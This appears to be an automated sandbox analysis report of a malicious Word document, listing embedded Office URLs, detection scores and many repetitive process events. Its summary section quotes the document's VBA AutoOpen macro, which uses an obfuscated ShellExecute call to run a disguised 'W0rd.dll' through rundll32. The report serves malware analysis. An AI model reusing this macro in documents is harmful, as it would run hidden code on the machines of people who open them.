Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows.local
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://management.azure.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://management.azure.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://messaging.office.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officeapps.live.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://onedrive.live.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office365.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://settings.outlook.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://tasks.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Document contains an embedded VBA macro which may execute processes
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Document contains an embedded VBA macro with suspicious strings
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen, String shellexecute: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL) Name: AutoOpen
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen, String shellexecute: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL) Name: AutoOpen
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 1118_8732615.doc OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen Name: AutoOpen
Source: 1118_8732615.doc OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen Name: AutoOpen
Document contains embedded VBA macros
Source: 1118_8732615.doc OLE indicator, VBA macros: true
Source: 1118_8732615.doc OLE indicator, VBA macros: true
Source: classification engine Classification label: mal64.expl.winDOC@1/7@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{23B756EC-0D85-4B59-AD8D-4A31056962F4} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{23B756EC-0D85-4B59-AD8D-4A31056962F4} - OProcSessId.dat Jump to behavior
Source: 1118_8732615.doc OLE indicator, Word Document stream: true
Source: 1118_8732615.doc OLE indicator, Word Document stream: true
Source: 1118_8732615.doc OLE document summary: title field not present or empty
Source: 1118_8732615.doc OLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 1118_8732615.doc Virustotal: Detection: 15%
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Source: 1118_8732615.doc Virustotal: Detection: 15%
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: 1118_8732615.doc
Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: 1118_8732615.doc
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
